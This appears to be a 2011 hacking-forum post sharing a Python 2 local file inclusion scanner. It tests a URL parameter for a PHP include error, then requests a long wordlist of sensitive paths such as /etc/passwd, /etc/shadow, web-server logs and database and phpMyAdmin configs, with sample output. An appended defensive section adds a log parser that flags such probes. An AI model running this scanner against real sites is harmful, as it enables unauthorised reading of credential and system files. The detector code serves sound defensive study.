[Python] LFI T00l
Author: BigBear
« on: 7 October 2011, 01:38 am »

Hi everyone.

I just finished a tool for testing an LFI vulnerability; if the page is
vulnerable, the script then automatically tries to brute-force files.

Code
#!/usr/bin/env python
# LFI T00l (C) Doddy Hackman
# Python 2 script (uses urllib2 and print statements)

import os,sys,urllib2,re

# Candidate paths appended to the target URL during the fuzzing step
files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini',
    '/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab',
    '/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf',
    '/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf',
    '/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf',
    '/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php',
    '/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log',
    '/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log',
    '/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log',
    '/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log',
    '/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log',
    '/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log',
    '/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log',
    '/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ',
    '/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log',
    '/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log',
    '/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log',
    '/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log',
    '/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log',
    '/var/log/httpd/access.log','/var/log/httpd/error.log',
    '/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log',
    '/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log',
    # Raw strings: in a plain literal the "\a" in "\access.log" would be read as an escape
    r'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',r'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
    '/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf',
    '/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf',
    '/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf',
    '/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf',
    '/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf',
    '/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf',
    '/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf',
    '/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default',
    '/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf',
    '/Volumes/webBackup/private/etc']

def header() :
    print "\n--== LFI T00l ==--\n"

def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    exit(1)

def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

# Fetch a URL and return the response body
def toma(web) :
    return urllib2.urlopen(web).read()

# Request each candidate path; report it unless PHP's include() warning appears
def fuzz(web):
    print "\n[+] Fuzzing files...\n"
    for file in files:
        code = toma(web+file)
        if not (re.findall("No such file or directory in",code)):
            print "[File Found] : ",web,file

# Append a quote and look for the PHP warning, which also discloses the script's full path
def test(web):
    try:
        print "\n[+] Testing vulnerability LFI in",web
        code = toma(web+"'")
        if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
            fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
            print "\n[+] LFI Detected"
            print "[+] Full Path discloure : ",fpd[0]
            fuzz(web)
        else:
            print "[-] LFI Not Found"
    except:
        pass

header()

if len(sys.argv) != 2 :
    show()

else :
    test(sys.argv[1])

copyright()

#The End

Usage example

Code:
python lfi.py http://127.0.0.1/lfi.php?file=

Code:
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010



« Last edit: 8 October 2011, 19:07 by Doddy »
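
A defender's view of the traffic this script generates, as an added example that is not part of the original post: it parses web access-log lines and flags clients whose query values carry the quote probe, traversal sequences or absolute paths like those in the wordlist. The log lines, IP addresses, function names and the threshold are constructed for illustration (Python 3).

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Combined Log Format); hosts and sizes are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Oct/2011:01:40:01 +0000] "GET /lfi.php?file=' HTTP/1.1" 200 412 "-" "Python-urllib/2.7"
203.0.113.7 - - [07/Oct/2011:01:40:02 +0000] "GET /lfi.php?file=../../../boot.ini HTTP/1.1" 200 398 "-" "Python-urllib/2.7"
203.0.113.7 - - [07/Oct/2011:01:40:02 +0000] "GET /lfi.php?file=/etc/passwd HTTP/1.1" 200 1544 "-" "Python-urllib/2.7"
203.0.113.7 - - [07/Oct/2011:01:40:03 +0000] "GET /lfi.php?file=%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 398 "-" "Python-urllib/2.7"
198.51.100.20 - - [07/Oct/2011:01:41:10 +0000] "GET /lfi.php?file=about.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.20 - - [07/Oct/2011:01:41:15 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3} ')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
# Top-level directories used by the wordlist above, plus Windows drive-letter paths.
ABS_PATH_RE = re.compile(r'^(?:/(?:etc|var|usr|opt|private|Volumes|logs|apache2?)/|[A-Za-z]:\\)')

def classify(value):
    """Return the reasons a single parameter value looks like an LFI probe."""
    value = unquote(value)  # a second decode catches double-encoded input
    reasons = []
    if value == "'":
        reasons.append("quote-probe")
    if TRAVERSAL_RE.search(value):
        reasons.append("traversal")
    if ABS_PATH_RE.match(value):
        reasons.append("absolute-path")
    return reasons

def scan(log_text, threshold=3):
    """Map client IP -> Counter of reasons, for clients with >= threshold flagged requests."""
    per_ip, flagged = {}, Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target = m.groups()
        hits = [r for _, v in parse_qsl(urlsplit(target).query) for r in classify(v)]
        if hits:
            flagged[ip] += 1
            per_ip.setdefault(ip, Counter()).update(hits)
    return {ip: c for ip, c in per_ip.items() if flagged[ip] >= threshold}
```

The detection test in the script depends on PHP printing the include() warning into the response; with `display_errors` off the path disclosure disappears, but the requests still show up in the log as above.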
